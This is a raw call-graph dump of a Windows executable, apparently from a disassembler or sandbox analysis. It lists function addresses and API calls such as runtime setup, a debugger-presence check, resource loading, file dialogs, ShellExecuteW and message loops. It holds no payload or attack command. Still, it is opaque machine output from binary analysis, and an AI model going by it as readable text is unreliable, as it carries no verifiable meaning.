InitializeCriticalSectionAndSpinCount 103324->103325 103325->103324 103326->103321 103326->103323 103326->103324 103327->103323 103328->103323 103328->103327 103330 2e3c3e 103329->103330 103331 2d6b30 103329->103331 103448 2d7660 47 API calls __crtCompareStringA_stat 103330->103448 103336 2e382b GetModuleFileNameW 103331->103336 103334 2e3c7a FreeEnvironmentStringsW 103334->103331 103335 2e3c64 _memmove 103335->103334 103337 2e385f _wparse_cmdline 103336->103337 103338 2d6b3a 103337->103338 103339 2e3899 103337->103339 103338->103270 103376 2d1d7b 47 API calls 3 library calls 103338->103376 103449 2d7660 47 API calls __crtCompareStringA_stat 103339->103449 103341 2e389f _wparse_cmdline 103341->103338 103343 2e3a7d __wsetenvp 103342->103343 103347 2e3a75 103342->103347 103344 2d7616 __calloc_crt 47 API calls 103343->103344 103345 2e3aa6 __wsetenvp 103344->103345 103345->103347 103348 2e3afd 103345->103348 103349 2d7616 __calloc_crt 47 API calls 103345->103349 103350 2e3b22 103345->103350 103353 2e3b39 103345->103353 103450 2e3317 47 API calls ___strgtold12_l 103345->103450 103346 2d28ca _free 47 API calls 103346->103347 103347->103273 103348->103346 103349->103345 103351 2d28ca _free 47 API calls 103350->103351 103351->103347 103451 2d7ab0 IsProcessorFeaturePresent 103353->103451 103355 2e3b45 103355->103273 103357 2d1dc1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 103356->103357 103359 2d1e00 __IsNonwritableInCurrentImage 103357->103359 103474 2d1b2a 52 API calls __cinit 103357->103474 103359->103277 103361 3223b5 103360->103361 103362 2b369c 103360->103362 103363 2b36d6 IsThemeActive 103362->103363 103475 2d2025 103363->103475 103367 2b3702 103487 2b32de SystemParametersInfoW SystemParametersInfoW 103367->103487 103369 2b370e 103488 2b374e GetCurrentDirectoryW 103369->103488 103372 2b373b 103372->103281 103373->103255 103374->103259 103375->103267 103379->103282 103380->103285 103381->103291 103382->103293 103383->103297 103384->103298 103388 2d761d 103385->103388 103387 2d765a 103387->103302 103391 2d8b59 TlsSetValue 103387->103391 103388->103387 103389 2d763b Sleep 103388->103389 103394 2e3e5a 103388->103394 103390 2d7652 103389->103390 103390->103387 103390->103388 103391->103305 103392->103309 103393->103306 103395 2e3e65 103394->103395 103396 2e3e80 __calloc_impl 103394->103396 103395->103396 103397 2e3e71 103395->103397 103398 2e3e90 RtlAllocateHeap 103396->103398 103400 2e3e76 103396->103400 103401 2d889e 47 API calls __getptd_noexit 103397->103401 103398->103396 103398->103400 103400->103388 103401->103400 103403 2d89a8 EnterCriticalSection 103402->103403 103404 2d8995 103402->103404 103403->103313 103410 2d8a0c 103404->103410 103406 2d899b 103406->103403 103434 2d1d7b 47 API calls 3 library calls 103406->103434 103409->103317 103411 2d8a18 __mtinitlocknum 103410->103411 103412 2d8a39 103411->103412 103413 2d8a21 103411->103413 103414 2d8a37 103412->103414 103421 2d8aa1 __mtinitlocknum 103412->103421 103435 2d8e52 47 API calls 2 library calls 103413->103435 103414->103412 103438 2d7660 47 API calls __crtCompareStringA_stat 103414->103438 103416 2d8a26 103436 2d8eb2 47 API calls 8 library calls 103416->103436 103419 2d8a4d 103422 2d8a54 103419->103422 103423 2d8a63 103419->103423 103420 2d8a2d 103437 2d1d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 103420->103437 103421->103406 103439 2d889e 47 API calls __getptd_noexit 103422->103439 103426 2d8984 __lock 46 API calls 103423->103426 103428 2d8a6a 103426->103428 103427 2d8a59 103427->103421 103429 2d8a8e 103428->103429 103430 2d8a79 InitializeCriticalSectionAndSpinCount 103428->103430 103440 2d28ca 103429->103440 103431 2d8a94 103430->103431 103446 2d8aaa LeaveCriticalSection _doexit 103431->103446 103435->103416 103436->103420 103438->103419 103439->103427 103441 2d28d3 RtlFreeHeap 103440->103441 103445 2d28fc _free 103440->103445 103442 2d28e8 103441->103442 103441->103445 103447 2d889e 47 API calls __getptd_noexit 103442->103447 103444 2d28ee GetLastError 103444->103445 103445->103431 103446->103421 103447->103444 103448->103335 103449->103341 103450->103345 103452 2d7abb 103451->103452 103457 2d7945 103452->103457 103456 2d7ad6 103456->103355 103458 2d795f _memset ___raise_securityfailure 103457->103458 103459 2d797f IsDebuggerPresent 103458->103459 103465 2d8e3c SetUnhandledExceptionFilter UnhandledExceptionFilter 103459->103465 103462 2d7a66 103464 2d8e27 GetCurrentProcess TerminateProcess 103462->103464 103463 2d7a43 ___raise_securityfailure 103466 2db4bf 103463->103466 103464->103456 103465->103463 103467 2db4c9 IsProcessorFeaturePresent 103466->103467 103468 2db4c7 103466->103468 103470 2e4560 103467->103470 103468->103462 103473 2e450f 5 API calls ___raise_securityfailure 103470->103473 103472 2e4643 103472->103462 103473->103472 103474->103359 103476 2d8984 __lock 47 API calls 103475->103476 103477 2d2030 103476->103477 103533 2d8ae8 LeaveCriticalSection 103477->103533 103479 2b36fb 103480 2d208d 103479->103480 103481 2d2097 103480->103481 103482 2d20b1 103480->103482 103481->103482 103534 2d889e 47 API calls __getptd_noexit 103481->103534 103482->103367 103484 2d20a1 103535 2d7aa0 8 API calls ___strgtold12_l 103484->103535 103486 2d20ac 103486->103367 103487->103369 103536 2b4257 103488->103536 103490 2b377f IsDebuggerPresent 103491 3221b7 MessageBoxA 103490->103491 103492 2b378d 103490->103492 103494 3221d0 103491->103494 103492->103494 103495 2b37aa 103492->103495 103523 2b3852 103492->103523 103493 2b3859 SetCurrentDirectoryW 103497 2b3716 SystemParametersInfoW 103493->103497 103697 2f2f5b 48 API calls 103494->103697 103600 2b3bff 103495->103600 103497->103372 103500 3221e0 103504 3221f6 SetCurrentDirectoryW 103500->103504 103501 2b37c8 GetFullPathNameW 103612 2b34f3 103501->103612 103504->103497 103505 2b380f 103506 2b3818 103505->103506 103698 2ebe31 AllocateAndInitializeSid CheckTokenMembership FreeSid 103505->103698 103627 2b30a5 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 103506->103627 103509 322213 103509->103506 103512 322224 GetModuleFileNameW 103509->103512 103514 2bcaee 48 API calls 103512->103514 103513 2b3822 103515 2b3837 103513->103515 103517 2b3598 67 API calls 103513->103517 103516 322245 103514->103516 103635 2be1f0 103515->103635 103519 322271 103516->103519 103520 32224c 103516->103520 103517->103515 103702 2b39e8 48 API calls 2 library calls 103519->103702 103699 2b39e8 48 API calls 2 library calls 103520->103699 103523->103493 103525 32226d GetForegroundWindow ShellExecuteW 103530 3222a5 Mailbox 103525->103530 103527 322257 103700 2b39e8 48 API calls 2 library calls 103527->103700 103530->103523 103531 322264 103701 2b39e8 48 API calls 2 library calls 103531->103701 103533->103479 103534->103484 103535->103486 103703 2b3c70 103536->103703 103540 2b4278 GetModuleFileNameW 103720 2b34c1 103540->103720 103545 2bcaee 48 API calls 103546 2b42ba 103545->103546 103735 2bd380 103546->103735 103548 2b42ca Mailbox 103549 2bcaee 48 API calls 103548->103549 103550 2b42f2 103549->103550 103551 2bd380 55 API calls 103550->103551 103552 2b4305 Mailbox 103551->103552 103553 2bcaee 48 API calls 103552->103553 103554 2b4316 103553->103554 103739 2bd2d2 103554->103739 103556 2b4328 Mailbox 103557 2bd3d2 48 API calls 103556->103557 103558 2b433b 103557->103558 103745 2b4477 103558->103745 103562 2b4355 103563 2b435f 103562->103563 103564 3220f7 103562->103564 103565 2d1bc7 _W_store_winword 59 API calls 103563->103565 103566 2b4477 48 API calls 103564->103566 103567 2b436a 103565->103567 103568 32210b 103566->103568 103567->103568 103569 2b4374 103567->103569 103570 2b4477 48 API calls 103568->103570 103571 2d1bc7 _W_store_winword 59 API calls 103569->103571 103572 322127 103570->103572 103573 2b437f 103571->103573 103575 32212f GetModuleFileNameW 103572->103575 103574 2b4389 103573->103574 103573->103575 103577 2d1bc7 _W_store_winword 59 API calls 103574->103577 103576 2b4477 48 API calls 103575->103576 103578 322160 103576->103578 103579 2b4394 103577->103579 103789 2bc935 48 API calls 103578->103789 103581 2b43d6 103579->103581 103582 322185 _wcscpy 103579->103582 103586 2b4477 48 API calls 103579->103586 103581->103582 103583 2b43e7 103581->103583 103590 2b4477 48 API calls 103582->103590 103761 2b3320 103583->103761 103584 32216e 103585 2b4477 48 API calls 103584->103585 103588 32217d 103585->103588 103589 2b43b8 _wcscpy 103586->103589 103588->103582 103594 2b4477 48 API calls 103589->103594 103592 3221ab 103590->103592 103591 2b43ff 103772 2c14a0 103591->103772 103592->103592 103594->103581 103595 2c14a0 48 API calls 103597 2b440f 103595->103597 103597->103595 103598 2b4477 48 API calls 103597->103598 103599 2b4451 Mailbox 103597->103599 103788 2b7bef 48 API calls 103597->103788 103598->103597 103599->103490 103601 2b3c1f 103600->103601 103602 323ce4 _memset 103600->103602 104322 2b31b8 103601->104322 103604 323cf6 GetOpenFileNameW 103602->103604 103604->103601 103606 2b37c0 103604->103606 103605 2b3c28 104329 2b3a67 SHGetMalloc 103605->104329 103606->103501 103606->103523 103608 2b3c31 104334 2b3b45 GetFullPathNameW 103608->104334 104407 2ba716 103612->104407 103614 2b3501 103615 2b3575 103614->103615 104418 2b21dd 86 API calls 103614->104418 103615->103500 103615->103505 103617 2b350a 103617->103615 104419 2b5460 88 API calls Mailbox 103617->104419 103619 2b3513 103619->103615 103620 2b3517 GetFullPathNameW 103619->103620 103621 2b7e53 48 API calls 103620->103621 103622 2b3541 103621->103622 103623 2b7e53 48 API calls 103622->103623 103624 2b354e 103623->103624 103625 3266b4 _wcscat 103624->103625 103626 2b7e53 48 API calls 103624->103626 103626->103615 103628 3221b0 103627->103628 103629 2b310f 103627->103629 104423 2b318a 103629->104423 103633 2b3185 103634 2b2e9d CreateWindowExW CreateWindowExW ShowWindow ShowWindow 103633->103634 103634->103513 103636 2be216 103635->103636 103657 2be226 Mailbox 103635->103657 103637 2be670 103636->103637 103636->103657 104501 2cecee 346 API calls 103637->104501 103639 2be4e7 103640 2b3842 103639->103640 104502 2b322e 16 API calls 103639->104502 103640->103523 103696 2b2b94 Shell_NotifyIconW _memset 103640->103696 103642 2be681 103642->103640 103644 2be68e 103642->103644 103643 2be26c PeekMessageW 103643->103657 104503 2cec33 346 API calls Mailbox 103644->104503 103646 325b13 Sleep 103646->103657 103647 2be695 LockWindowUpdate DestroyWindow GetMessageW 103647->103640 103649 2be6c7 103647->103649 103651 3262a7 TranslateMessage DispatchMessageW GetMessageW 103649->103651 103651->103651 103652 3262d7 103651->103652 103652->103640 103653 2be657 PeekMessageW 103653->103657 103654 2d010a 48 API calls 103654->103657 103655 2be517 timeGetTime 103655->103657 103657->103639 103657->103643 103657->103646 103657->103653 103657->103654 103657->103655 103659 325dfc WaitForSingleObject 103657->103659 103660 325cce Mailbox 103657->103660 103661 2be641 TranslateMessage DispatchMessageW 103657->103661 103662 326147 Sleep 103657->103662 103665 2be6cc timeGetTime 103657->103665 103666 325feb Sleep 103657->103666 103673 2b1000 322 API calls 103657->103673 103676 325cea Sleep 103657->103676 103682 2ccf79 49 API calls 103657->103682 103692 2fd520 86 API calls 103657->103692 103694 2bcaee 48 API calls 103657->103694 103695 2bd380 55 API calls 103657->103695 104429 2bea00 103657->104429 104479 2c44e0 103657->104479 104496 2be7b0 346 API calls Mailbox 103657->104496 104497 2be7e0 346 API calls 103657->104497 104498 2c3680 346 API calls 2 library calls 103657->104498 104499 2cf381 TranslateAcceleratorW 103657->104499 104500 2ced1a IsDialogMessageW GetClassLongW 103657->104500 104505 2bc935 48 API calls 103657->104505 104506 318b20 48 API calls 103657->104506 104510 2bfa40 103657->104510 103659->103657 103663 325e19 GetExitCodeProcess CloseHandle 103659->103663 103660->103657 103664 2bd3d2 48 API calls 103660->103664 103670 2ce3a5 timeGetTime 103660->103670 103671 3261de GetExitCodeProcess 103660->103671 103660->103676 103678 2b1dce 107 API calls 103660->103678 103679 325cd7 Sleep 103660->103679 103680 318a48 108 API calls 103660->103680 103681 326266 Sleep 103660->103681 103684 2bcaee 48 API calls 103660->103684 103687 2bd380 55 API calls 103660->103687 104507 2f56dc 49 API calls Mailbox 103660->104507 104508 2ccf79 49 API calls 103660->104508 104509 2b1000 346 API calls 103660->104509 104549 30d12a 50 API calls 103660->104549 104550 2f8355 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 103660->104550 104551 2f6f5b 63 API calls 3 library calls 103660->104551 103661->103653 103662->103660 103663->103657 103664->103660 104504 2ccf79 49 API calls 103665->104504 103666->103660 103670->103660 103674 3261f4 WaitForSingleObject 103671->103674 103675 32620a CloseHandle 103671->103675 103673->103657 103674->103657 103674->103675 103675->103660 103676->103657 103678->103660 103679->103676 103680->103660 103681->103657 103682->103657 103684->103660 103687->103660 103692->103657 103694->103657 103695->103657 103696->103523 103697->103500 103698->103509 103699->103527 103700->103531 103701->103525 103702->103525 103704 2bd3d2 48 API calls 103703->103704 103705 2b3c80 103704->103705 103706 2ba359 103705->103706 103707 2ba366 __ftell_nolock 103706->103707 103708 2ba4cc Mailbox 103707->103708 103709 2b7e53 48 API calls 103707->103709 103708->103540 103710 2ba398 103709->103710 103719 2ba3ce Mailbox 103710->103719 103790 2ba4f6 103710->103790 103712 2ba4f6 48 API calls 103712->103719 103713 2ba49f 103713->103708 103714 2bcaee 48 API calls 103713->103714 103716 2ba4c0 103714->103716 103715 2bcaee 48 API calls 103715->103719 103794 2b5b47 48 API calls _memmove 103716->103794 103719->103708 103719->103712 103719->103713 103719->103715 103793 2b5b47 48 API calls _memmove 103719->103793 103795 2b3f9b 103720->103795 103723 2b34ea 103732 2b8182 103723->103732 103726 3234c3 103728 2d28ca _free 47 API calls 103726->103728 103729 3234d0 103728->103729 103730 2b3e39 84 API calls 103729->103730 103731 3234d9 103730->103731 103731->103731 103733 2d010a 48 API calls 103732->103733 103734 2b42ad 103733->103734 103734->103545 103736 2bd38b 103735->103736 103737 2bd3b4 103736->103737 104311 2bd772 55 API calls 103736->104311 103737->103548 103742 2bd2df 103739->103742 103743 2bd30a 103739->103743 103740 2bd2e6 103740->103743 104312 2bd349 53 API calls 103740->104312 103742->103740 104313 2bd349 53 API calls 103742->104313 103743->103556 103746 2b449a 103745->103746 103747 2b4481 103745->103747 103749 2b7e53 48 API calls 103746->103749 104314 2bc935 48 API calls 103747->104314 103750 2b4347 103749->103750 103751 2d1bc7 103750->103751 103752 2d1c48 103751->103752 103753 2d1bd3 103751->103753 104317 2d1c5a 59 API calls 3 library calls 103752->104317 103760 2d1bf8 103753->103760 104315 2d889e 47 API calls __getptd_noexit 103753->104315 103756 2d1c55 103756->103562 103757 2d1bdf 104316 2d7aa0 8 API calls ___strgtold12_l 103757->104316 103759 2d1bea 103759->103562 103760->103562 103762 2b3334 103761->103762 103764 2b3339 Mailbox 103761->103764 104318 2b342c 48 API calls 103762->104318 103769 2b3347 103764->103769 104319 2b346e 48 API calls 103764->104319 103766 2d010a 48 API calls 103768 2b33d8 103766->103768 103767 2b3422 103767->103591 103770 2d010a 48 API calls 103768->103770 103769->103766 103769->103767 103771 2b33e3 103770->103771 103771->103591 103773 2c1606 103772->103773 103775 2c14b2 103772->103775 103773->103597 103774 2c14be 103782 2c14c9 103774->103782 104321 2b346e 48 API calls 103774->104321 103775->103774 103777 2d010a 48 API calls 103775->103777 103778 325299 103777->103778 103779 2d010a 48 API calls 103778->103779 103787 3252a4 103779->103787 103780 2c156d 103780->103597 103781 2d010a 48 API calls 103783 2c15af 103781->103783 103782->103780 103782->103781 103784 2c15c2 103783->103784 104320 2cd6b4 48 API calls 103783->104320 103784->103597 103786 2d010a 48 API calls 103786->103787 103787->103774 103787->103786 103788->103597 103789->103584 103791 2bb8a7 48 API calls 103790->103791 103792 2ba501 103791->103792 103792->103710 103793->103719 103794->103708 103860 2b3f5d 103795->103860 103800 325830 103802 2b3e39 84 API calls 103800->103802 103801 2b3fc6 LoadLibraryExW 103870 2b3e78 103801->103870 103805 325837 103802->103805 103807 2b3e78 3 API calls 103805->103807 103809 32583f 103807->103809 103808 2b3fed 103808->103809 103810 2b3ff9 103808->103810 103896 2b417d 103809->103896 103811 2b3e39 84 API calls 103810->103811 103813 2b34e2 103811->103813 103813->103723 103819 2fcc82 103813->103819 103816 325866 103904 2b41cb 103816->103904 103818 325873 103820 2b41a7 83 API calls 103819->103820 103821 2fccf1 103820->103821 104085 2fce59 103821->104085 103824 2b417d 64 API calls 103826 2fcd1e 103824->103826 103825 2fcd07 103825->103726 103854 2b3e39 103825->103854 103827 2b417d 64 API calls 103826->103827 103828 2fcd2e 103827->103828 103829 2b417d 64 API calls 103828->103829 103830 2fcd49 103829->103830 103831 2b417d 64 API calls 103830->103831 103832 2fcd64 103831->103832 103833 2b41a7 83 API calls 103832->103833 103834 2fcd7b 103833->103834 103835 2d45ec __crtCompareStringA_stat 47 API calls 103834->103835 103836 2fcd82 103835->103836 103837 2d45ec __crtCompareStringA_stat 47 API calls 103836->103837 103838 2fcd8c 103837->103838 103839 2b417d 64 API calls 103838->103839 103840 2fcda0 103839->103840 103841 2fc846 GetSystemTimeAsFileTime 103840->103841 103842 2fcdb3 103841->103842 103843 2fcddd 103842->103843 103844 2fcdc8 103842->103844 103846 2fcde3 103843->103846 103847 2fce42 103843->103847 103845 2d28ca _free 47 API calls 103844->103845 103850 2fcdce 103845->103850 104091 2fc251 118 API calls __fcloseall 103846->104091 103849 2d28ca _free 47 API calls 103847->103849 103849->103825 103852 2d28ca _free 47 API calls 103850->103852 103851 2fce3a 103853 2d28ca _free 47 API calls 103851->103853 103852->103825 103853->103825 103855 2b3e4a 103854->103855 103856 2b3e43 103854->103856 103858 2b3e6a FreeLibrary 103855->103858 103859 2b3e59 103855->103859 104092 2d4274 103856->104092 103858->103859 103859->103726 103909 2b3f20 103860->103909 103864 2b3f8d FreeLibrary 103865 2b3f96 103864->103865 103867 2d4129 103865->103867 103866 2b3f85 103866->103864 103866->103865 103917 2d413e 103867->103917 103869 2b3fba 103869->103800 103869->103801 103996 2b3eb3 103870->103996 103873 2b3ea8 FreeLibrary 103874 2b3eb1 103873->103874 103877 2b4010 103874->103877 103876 2b3e9f 103876->103873 103876->103874 103878 2d010a 48 API calls 103877->103878 103879 2b4025 103878->103879 104004 2b4bce 103879->104004 103881 2b4031 _memmove 103882 2b406c 103881->103882 103884 2b4129 103881->103884 103885 2b4161 103881->103885 103883 2b41cb 57 API calls 103882->103883 103888 2b4075 103883->103888 104007 2b31f2 CreateStreamOnHGlobal 103884->104007 104018 2fd03f 93 API calls 103885->104018 103889 2b417d 64 API calls 103888->103889 103890 2b4109 103888->103890 103892 325794 103888->103892 104013 2b41a7 103888->104013 103889->103888 103890->103808 103893 2b41a7 83 API calls 103892->103893 103894 3257a8 103893->103894 103895 2b417d 64 API calls 103894->103895 103895->103890 103897 2b418f 103896->103897 103898 32587d 103896->103898 104042 2d44ae 103897->104042 103901 2fc846 104062 2fc6a0 103901->104062 103903 2fc85c 103903->103816 103905 2b41da 103904->103905 103908 3258bf 103904->103908 104067 2d4af5 103905->104067 103907 2b41e2 103907->103818 103913 2b3f32 103909->103913 103912 2b3f08 LoadLibraryA GetProcAddress 103912->103866 103914 2b3f28 103913->103914 103915 2b3f3b LoadLibraryA 103913->103915 103914->103866 103914->103912 103915->103914 103916 2b3f4c GetProcAddress 103915->103916 103916->103914 103920 2d414a __mtinitlocknum 103917->103920 103918 2d415d 103965 2d889e 47 API calls __getptd_noexit 103918->103965 103920->103918 103922 2d418e 103920->103922 103921 2d4162 103966 2d7aa0 8 API calls ___strgtold12_l 103921->103966 103936 2df278 103922->103936 103925 2d4193 103926 2d419c 103925->103926 103927 2d41a9 103925->103927 103967 2d889e 47 API calls __getptd_noexit 103926->103967 103928 2d41d3 103927->103928 103929 2d41b3 103927->103929 103950 2df390 103928->103950 103968 2d889e 47 API calls __getptd_noexit 103929->103968 103933 2d416d __mtinitlocknum @_EH4_CallFilterFunc@8 103933->103869 103937 2df284 __mtinitlocknum 103936->103937 103938 2d8984 __lock 47 API calls 103937->103938 103948 2df292 103938->103948 103939 2df302 103970 2df387 103939->103970 103940 2df309 103975 2d7660 47 API calls __crtCompareStringA_stat 103940->103975 103943 2df310 103943->103939 103945 2df31f InitializeCriticalSectionAndSpinCount EnterCriticalSection 103943->103945 103944 2df37c __mtinitlocknum 103944->103925 103945->103939 103946 2d8a0c __mtinitlocknum 47 API calls 103946->103948 103948->103939 103948->103940 103948->103946 103973 2d5ade 48 API calls __lock 103948->103973 103974 2d5b48 LeaveCriticalSection LeaveCriticalSection _doexit 103948->103974 103958 2df3b0 __wopenfile 103950->103958 103951 2df3ca 103980 2d889e 47 API calls __getptd_noexit 103951->103980 103953 2df3cf 103981 2d7aa0 8 API calls ___strgtold12_l 103953->103981 103955 2df5e8 103977 2e7179 103955->103977 103956 2d41de 103969 2d4200 LeaveCriticalSection LeaveCriticalSection __wfsopen 103956->103969 103958->103951 103964 2df585 103958->103964 103982 2d247b 59 API calls 2 library calls 103958->103982 103960 2df57e 103960->103964 103983 2d247b 59 API calls 2 library calls 103960->103983 103962 2df59d 103962->103964 103984 2d247b 59 API calls 2 library calls 103962->103984 103964->103951 103964->103955 103965->103921 103966->103933 103967->103933 103968->103933 103969->103933 103976 2d8ae8 LeaveCriticalSection 103970->103976 103972 2df38e 103972->103944 103973->103948 103974->103948 103975->103943 103976->103972 103985 2e6961 103977->103985 103979 2e7192 103979->103956 103980->103953 103981->103956 103982->103960 103983->103962 103984->103964 103987 2e696d __mtinitlocknum 103985->103987 103986 2e697f 103988 2d889e ___strgtold12_l 47 API calls 103986->103988 103987->103986 103989 2e69b6 103987->103989 103990 2e6984 103988->103990 103991 2e6a28 __wsopen_helper 110 API calls 103989->103991 103992 2d7aa0 ___strgtold12_l 8 API calls 103990->103992 103993 2e69d3 103991->103993 103995 2e698e __mtinitlocknum 103992->103995 103994 2e69fc __wsopen_helper LeaveCriticalSection 103993->103994 103994->103995 103995->103979 104000 2b3ec5 103996->104000 103999 2b3ef0 LoadLibraryA GetProcAddress 103999->103876 104001 2b3e91 104000->104001 104002 2b3ece LoadLibraryA 104000->104002 104001->103876 104001->103999 104002->104001 104003 2b3edf GetProcAddress 104002->104003 104003->104001 104005 2d010a 48 API calls 104004->104005 104006 2b4be0 104005->104006 104006->103881 104008 2b3229 104007->104008 104009 2b320c FindResourceExW 104007->104009 104008->103882 104009->104008 104010 3257d3 LoadResource 104009->104010 104010->104008 104011 3257e8 SizeofResource 104010->104011 104011->104008 104012 3257fc LockResource 104011->104012 104012->104008 104014 2b41b6 104013->104014 104015 32589d 104013->104015 104019 2d471d 104014->104019 104017 2b41c4 104017->103888 104018->103882 104022 2d4729 __mtinitlocknum 104019->104022 104020 2d4737 104032 2d889e 47 API calls __getptd_noexit 104020->104032 104021 2d475d 104034 2d5a9f 104021->104034 104022->104020 104022->104021 104025 2d473c 104033 2d7aa0 8 API calls ___strgtold12_l 104025->104033 104026 2d4763 104040 2d468e 81 API calls 3 library calls 104026->104040 104029 2d4772 104041 2d4794 LeaveCriticalSection LeaveCriticalSection __wfsopen 104029->104041 104031 2d4747 __mtinitlocknum 104031->104017 104032->104025 104033->104031 104035 2d5aaf 104034->104035 104036 2d5ad1 EnterCriticalSection 104034->104036 104035->104036 104037 2d5ab7 104035->104037 104038 2d5ac7 104036->104038 104039 2d8984 __lock 47 API calls 104037->104039 104038->104026 104039->104038 104040->104029 104041->104031 104045 2d44c9 104042->104045 104044 2b41a0 104044->103901 104046 2d44d5 __mtinitlocknum 104045->104046 104047 2d4510 __mtinitlocknum 104046->104047 104048 2d4518 104046->104048 104049 2d44eb _memset 104046->104049 104047->104044 104050 2d5a9f __lock_file 48 API calls 104048->104050 104058 2d889e 47 API calls __getptd_noexit 104049->104058 104052 2d451e 104050->104052 104060 2d42eb 62 API calls 6 library calls 104052->104060 104053 2d4505 104059 2d7aa0 8 API calls ___strgtold12_l 104053->104059 104056 2d4534 104061 2d4552 LeaveCriticalSection LeaveCriticalSection __wfsopen 104056->104061 104058->104053 104059->104047 104060->104056 104061->104047 104065 2d40da GetSystemTimeAsFileTime 104062->104065 104064 2fc6af 104064->103903 104066 2d4108 __aulldiv 104065->104066 104066->104064 104068 2d4b01 __mtinitlocknum 104067->104068 104069 2d4b0f 104068->104069 104070 2d4b24 104068->104070 104081 2d889e 47 API calls __getptd_noexit 104069->104081 104072 2d5a9f __lock_file 48 API calls 104070->104072 104074 2d4b2a 104072->104074 104073 2d4b14 104082 2d7aa0 8 API calls ___strgtold12_l 104073->104082 104083 2d479c 55 API calls 4 library calls 104074->104083 104077 2d4b35 104084 2d4b55 LeaveCriticalSection LeaveCriticalSection __wfsopen 104077->104084 104079 2d4b47 104080 2d4b1f __mtinitlocknum 104079->104080 104080->103907 104081->104073 104082->104080 104083->104077 104084->104079 104089 2fce6d __tzset_nolock _wcscmp 104085->104089 104086 2fcd03 104086->103824 104086->103825 104087 2b417d 64 API calls 104087->104089 104088 2fc846 GetSystemTimeAsFileTime 104088->104089 104089->104086 104089->104087 104089->104088 104090 2b41a7 83 API calls 104089->104090 104090->104089 104091->103851 104093 2d4280 __mtinitlocknum 104092->104093 104094 2d42ac 104093->104094 104095 2d4294 104093->104095 104098 2d5a9f __lock_file 48 API calls 104094->104098 104101 2d42a4 __mtinitlocknum 104094->104101 104121 2d889e 47 API calls __getptd_noexit 104095->104121 104097 2d4299 104122 2d7aa0 8 API calls ___strgtold12_l 104097->104122 104100 2d42be 104098->104100 104105 2d4208 104100->104105 104101->103855 104106 2d422b 104105->104106 104107 2d4217 104105->104107 104113 2d4227 104106->104113 104124 2d3914 104106->104124 104164 2d889e 47 API calls __getptd_noexit 104107->104164 104109 2d421c 104165 2d7aa0 8 API calls ___strgtold12_l 104109->104165 104123 2d42e3 LeaveCriticalSection LeaveCriticalSection __wfsopen 104113->104123 104117 2d4245 104141 2df782 104117->104141 104119 2d424b 104119->104113 104120 2d28ca _free 47 API calls 104119->104120 104120->104113 104121->104097 104122->104101 104123->104101 104125 2d3927 104124->104125 104129 2d394b 104124->104129 104126 2d35c3 __flush 47 API calls 104125->104126 104125->104129 104127 2d3944 104126->104127 104166 2dbd14 104127->104166 104130 2df8e6 104129->104130 104131 2d423f 104130->104131 104132 2df8f3 104130->104132 104134 2d35c3 104131->104134 104132->104131 104133 2d28ca _free 47 API calls 104132->104133 104133->104131 104135 2d35cd 104134->104135 104136 2d35e2 104134->104136 104272 2d889e 47 API calls __getptd_noexit 104135->104272 104136->104117 104138 2d35d2 104273 2d7aa0 8 API calls ___strgtold12_l 104138->104273 104140 2d35dd 104140->104117 104142 2df78e __mtinitlocknum 104141->104142 104143 2df7ae 104142->104143 104144 2df796 104142->104144 104145 2df82b 104143->104145 104150 2df7d8 104143->104150 104289 2d886a 47 API calls __getptd_noexit 104144->104289 104293 2d886a 47 API calls __getptd_noexit 104145->104293 104147 2df79b 104290 2d889e 47 API calls __getptd_noexit 104147->104290 104149 2df830 104294 2d889e 47 API calls __getptd_noexit 104149->104294 104153 2db6a0 ___lock_fhandle 49 API calls 104150->104153 104155 2df7de 104153->104155 104154 2df838 104295 2d7aa0 8 API calls ___strgtold12_l 104154->104295 104157 2df7fc 104155->104157 104158 2df7f1 104155->104158 104291 2d889e 47 API calls __getptd_noexit 104157->104291 104274 2df84c 104158->104274 104161 2df7f7 104292 2df823 LeaveCriticalSection __unlock_fhandle 104161->104292 104162 2df7a3 __mtinitlocknum 104162->104119 104164->104109 104165->104113 104167 2dbd20 __mtinitlocknum 104166->104167 104168 2dbd28 104167->104168 104169 2dbd40 104167->104169 104264 2d886a 47 API calls __getptd_noexit 104168->104264 104170 2dbdd5 104169->104170 104175 2dbd72 104169->104175 104269 2d886a 47 API calls __getptd_noexit 104170->104269 104172 2dbd2d 104265 2d889e 47 API calls __getptd_noexit 104172->104265 104191 2db6a0 104175->104191 104176 2dbdda 104270 2d889e 47 API calls __getptd_noexit 104176->104270 104179 2dbd78 104181 2dbd9e 104179->104181 104182 2dbd8b 104179->104182 104180 2dbde2 104271 2d7aa0 8 API calls ___strgtold12_l 104180->104271 104266 2d889e 47 API calls __getptd_noexit 104181->104266 104200 2dbdf6 104182->104200 104184 2dbd35 __mtinitlocknum 104184->104129 104187 2dbd97 104268 2dbdcd LeaveCriticalSection __unlock_fhandle 104187->104268 104188 2dbda3 104267 2d886a 47 API calls __getptd_noexit 104188->104267 104192 2db6ac __mtinitlocknum 104191->104192 104193 2db6f9 EnterCriticalSection 104192->104193 104195 2d8984 __lock 47 API calls 104192->104195 104194 2db71f __mtinitlocknum 104193->104194 104194->104179 104196 2db6d0 104195->104196 104197 2db6ed 104196->104197 104198 2db6db InitializeCriticalSectionAndSpinCount 104196->104198 104199 2db723 ___lock_fhandle LeaveCriticalSection 104197->104199 104198->104197 104199->104193 104201 2dbe03 __ftell_nolock 104200->104201 104202 2dbe5f 104201->104202 104203 2dbe40 104201->104203 104247 2dbe35 104201->104247 104206 2dbeb8 104202->104206 104207 2dbe9c 104202->104207 104205 2d886a __lseeki64 47 API calls 104203->104205 104204 2db4bf ___strgtold12_l 6 API calls 104208 2dc61e 104204->104208 104209 2dbe45 104205->104209 104211 2dbecf 104206->104211 104215 2e05df __lseeki64_nolock 49 API calls 104206->104215 104210 2d886a __lseeki64 47 API calls 104207->104210 104208->104187 104212 2d889e ___strgtold12_l 47 API calls 104209->104212 104214 2dbea1 104210->104214 104213 2e49a2 __flswbuf 47 API calls 104211->104213 104216 2dbe4c 104212->104216 104217 2dbedd 104213->104217 104218 2d889e ___strgtold12_l 47 API calls 104214->104218 104215->104211 104219 2d7aa0 ___strgtold12_l 8 API calls 104216->104219 104220 2dc1fe 104217->104220 104225 2d869d ____lc_codepage_func 47 API calls 104217->104225 104221 2dbea8 104218->104221 104219->104247 104222 2dc56b WriteFile 